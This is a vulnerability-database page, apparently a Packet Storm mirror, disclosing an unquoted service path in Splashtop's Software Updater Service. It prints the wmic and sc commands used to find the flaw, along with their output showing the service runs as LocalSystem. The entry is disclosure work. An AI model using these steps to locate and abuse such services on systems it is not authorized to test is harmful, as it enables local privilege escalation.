Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormA.I. HernandezPACKETSTORM:171625
HistoryApr 03, 2023 - 12:00 a.m.

Splashtop 8.71.12001.0 Unquoted Service Path

2023-04-0300:00:00
A.I. Hernandez
packetstormsecurity.com
176
splashtop
unquoted service path
windows 10
vulnerability
JSON
`# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path  
# Date: 12/20/2022  
# Exploit Author: A.I. hernandez  
# Version: 8.71.12001.0  
# Vendor Homepage: https://www.splashtop.com  
# Version: current version  
# Tested on: Windows 10 21H2  
# Step to discover Unquoted Service Path:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
  
Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe  
  
Auto  
  
C:\>sc qc SSUService  
[SC] QueryServiceConfig CORRECTO  
  
NOMBRE_SERVICIO: SSUService  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_INICIO : 2 AUTO_START  
CONTROL_ERROR : 0 IGNORE  
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe  
GRUPO_ORDEN_CARGA :  
ETIQUETA : 0  
NOMBRE_MOSTRAR : Splashtop Software Updater Service  
DEPENDENCIAS :  
NOMBRE_INICIO_SERVICIO: LocalSystem  
  
`
JSON